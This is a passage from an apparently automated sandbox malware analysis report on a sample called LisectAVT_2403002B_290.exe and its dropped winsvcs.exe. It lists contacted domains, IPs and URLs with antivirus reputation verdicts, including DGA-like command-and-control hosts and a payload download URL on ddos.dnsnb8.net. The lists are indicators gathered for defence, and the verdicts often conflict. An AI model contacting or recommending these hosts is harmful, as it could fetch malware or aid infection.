http://fuaiuebndieufeufu.ru/tldr.php?newinf=1	0%	Avira URL Cloud	safe
http://slpsrgpsrhojifdij.net/tldr.php?newinf=1	0%	Avira URL Cloud	safe
http://afeifieuuufufufuf.com/	0%	Avira URL Cloud	safe
http://aiiaiafrzrueuedur.biz/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://ssofhoseuegsgrfnj.biz/tldr.php?newinf=1	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarh?p	100%	Avira URL Cloud	malware
http://srndndubsbsifurfd.in/tldr.php?newinf=1	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
86537.BODIS.COM	199.59.243.226	true	false	unknown
ssofhoseuegsgrfnj.su	92.246.89.93	true	false	unknown
aiiaiafrzrueuedur.ru	92.246.89.93	true	false	unknown
eiifngjfksisiufjf.in	44.213.104.86	true	false	unknown
afeifieuuufufufuf.com	74.119.239.234	true	false	unknown
eofihsishihiursgu.net	44.213.104.86	true	false	unknown
noeuaoenriusfiruu.biz	54.244.188.177	true	false	unknown
aiiaiafrzrueuedur.net	185.215.113.66	true	false	unknown
ssofhoseuegsgrfnj.in	208.100.26.245	true	false	unknown
iuirshriuisruruuf.in	44.221.84.105	true	false	unknown
fifiehsueuufidhfi.biz	54.244.188.177	true	false	unknown
fifiehsueuufidhfi.com	54.244.188.177	true	false	unknown
ssofhoseuegsgrfnj.biz	54.244.188.177	true	false	unknown
slpsrgpsrhojifdij.ru	92.246.89.93	true	false	unknown
ddos.dnsnb8.net	44.221.84.105	true	false	unknown
nousiieiffgogogoo.net	18.141.10.107	true	false	unknown
fiiauediehduefuge.ru	44.221.84.105	true	false	unknown
ssofhoseuegsgrfnu.ru	170.39.226.155	true	false	unknown
fuaiuebndieufeufu.com	54.244.188.177	true	false	unknown
eiifngjfksisiufjf.biz	34.218.204.173	true	false	unknown
afeifieuuufufufuf.su	92.246.89.93	true	false	unknown
slpsrgpsrhojifdij.net	13.251.16.150	true	false	unknown
iuirshriuisruruuf.biz	unknown	unknown	true	unknown
aiiaiafrzrueuedur.in	unknown	unknown	true	unknown
nnososoosjfeuhueu.com	unknown	unknown	true	unknown
eiifngjfksisiufjf.ru	unknown	unknown	true	unknown
noeuaoenriusfiruu.su	unknown	unknown	true	unknown
fuaiuebndieufeufu.net	unknown	unknown	true	unknown
srndndubsbsifurfd.com	unknown	unknown	true	unknown
slpsrgpsrhojifdij.biz	unknown	unknown	true	unknown
fuaiuebndieufeufu.biz	unknown	unknown	true	unknown
eofihsishihiursgu.in	unknown	unknown	true	unknown
nousiieiffgogogoo.su	unknown	unknown	true	unknown
slpsrgpsrhojifdij.in	unknown	unknown	true	unknown
nousiieiffgogogoo.biz	unknown	unknown	true	unknown
nousiieiffgogogoo.com	unknown	unknown	true	unknown
iuirshriuisruruuf.com	unknown	unknown	true	unknown
aiiaiafrzrueuedur.biz	unknown	unknown	true	unknown
fiiauediehduefuge.su	unknown	unknown	true	unknown
afeifieuuufufufuf.ru	unknown	unknown	true	unknown
eofihsishihiursgu.com	unknown	unknown	true	unknown
srndndubsbsifurfd.in	unknown	unknown	true	unknown
eoroooskfogihisrg.com	unknown	unknown	true	unknown
eoroooskfogihisrg.ru	unknown	unknown	true	unknown
eiifngjfksisiufjf.su	unknown	unknown	true	unknown
eoroooskfogihisrg.net	unknown	unknown	true	unknown
aiiaiafrzrueuedur.com	unknown	unknown	true	unknown
nnososoosjfeuhueu.net	unknown	unknown	true	unknown
ww88.ssofhoseuegsgrfnu.ru	unknown	unknown	true	unknown
fuaiuebndieufeufu.su	unknown	unknown	true	unknown
nnososoosjfeuhueu.su	unknown	unknown	true	unknown
fiiauediehduefuge.biz	unknown	unknown	true	unknown
fiiauediehduefuge.net	unknown	unknown	true	unknown
eofihsishihiursgu.ru	unknown	unknown	true	unknown
eofihsishihiursgu.biz	unknown	unknown	true	unknown
eoroooskfogihisrg.biz	unknown	unknown	true	unknown
fifiehsueuufidhfi.in	unknown	unknown	true	unknown
fiiauediehduefuge.com	unknown	unknown	true	unknown
eoroooskfogihisrg.su	unknown	unknown	true	unknown
slpsrgpsrhojifdij.com	unknown	unknown	true	unknown
iuirshriuisruruuf.net	unknown	unknown	true	unknown
fuaiuebndieufeufu.ru	unknown	unknown	true	unknown
aiiaiafrzrueuedur.su	unknown	unknown	true	unknown
nnososoosjfeuhueu.ru	unknown	unknown	true	unknown
nousiieiffgogogoo.in	unknown	unknown	true	unknown
eofihsishihiursgu.su	unknown	unknown	true	unknown
eiifngjfksisiufjf.com	unknown	unknown	true	unknown
iuirshriuisruruuf.ru	unknown	unknown	true	unknown
slpsrgpsrhojifdij.su	unknown	unknown	true	unknown
fiiauediehduefuge.in	unknown	unknown	true	unknown
fifiehsueuufidhfi.ru	unknown	unknown	true	unknown
noeuaoenriusfiruu.com	unknown	unknown	true	unknown
eiifngjfksisiufjf.net	unknown	unknown	true	unknown
afeifieuuufufufuf.biz	unknown	unknown	true	unknown
ssofhoseuegsgrfnj.net	unknown	unknown	true	unknown
afeifieuuufufufuf.net	unknown	unknown	true	unknown
srndndubsbsifurfd.su	unknown	unknown	true	unknown
srndndubsbsifurfd.net	unknown	unknown	true	unknown
noeuaoenriusfiruu.ru	unknown	unknown	true	unknown
fuaiuebndieufeufu.in	unknown	unknown	true	unknown
nnososoosjfeuhueu.in	unknown	unknown	true	unknown
nousiieiffgogogoo.ru	unknown	unknown	true	unknown
iuirshriuisruruuf.su	unknown	unknown	true	unknown
noeuaoenriusfiruu.net	unknown	unknown	true	unknown
fifiehsueuufidhfi.su	unknown	unknown	true	unknown
fifiehsueuufidhfi.net	unknown	unknown	true	unknown
afeifieuuufufufuf.in	unknown	unknown	true	unknown
srndndubsbsifurfd.biz	unknown	unknown	true	unknown
eoroooskfogihisrg.in	unknown	unknown	true	unknown
noeuaoenriusfiruu.in	unknown	unknown	true	unknown
ssofhoseuegsgrfnj.com	unknown	unknown	true	unknown
srndndubsbsifurfd.ru	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar	true	URL Reputation: malware	unknown
http://ssofhoseuegsgrfnj.biz/tldr.php?newinf=1	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://srndndubsbsifurfd.biz/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	true	Avira URL Cloud: malware	unknown
http://eofihsishihiursgu.su/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	true	Avira URL Cloud: malware	unknown
http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://afeifieuuufufufuf.net/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	true	Avira URL Cloud: malware	unknown
http://fiiauediehduefuge.ru/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://nnososoosjfeuhueu.su/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1O	winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ssofhoseuegsgrfnj.su/tldr.php?newinf=1U1	winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.activestate.comHolger	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://eiifngjfksisiufjf.info/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://eoroooskfogihisrg.in/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ssofhoseuegsgrfnu.ru/http://92.63.197.48/http://slpsrgpsrhojifdij.ru/http://aiiaiafrzrueuedur	LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nousiieiffgogogoo.com/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://afeifieuuufufufuf.su/tldr.php?newinf=1fo	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nnososoosjfeuhueu.info/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://nnososoosjfeuhueu.com/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false		unknown
http://eoroooskfogihisrg.su/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://eoroooskfogihisrg.biz/tldr.php?newinf=1K	winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://eiifngjfksisiufjf.com/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://eoroooskfogihisrg.su/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://fifiehsueuufidhfi.net/tldr.php?newinf=1P	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://fuaiuebndieufeufu.com/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://aiiaiafrzrueuedur.info/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://eoroooskfogihisrg.biz/tldr.php?newinf=1T	winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://srndndubsbsifurfd.ru/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://srndndubsbsifurfd.in/tldr.php?newinf=19h	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aiiaiafrzrueuedur.net/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false		unknown
http://eiifngjfksisiufjf.com/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://eoroooskfogihisrg.com/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://fifiehsueuufidhfi.net/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 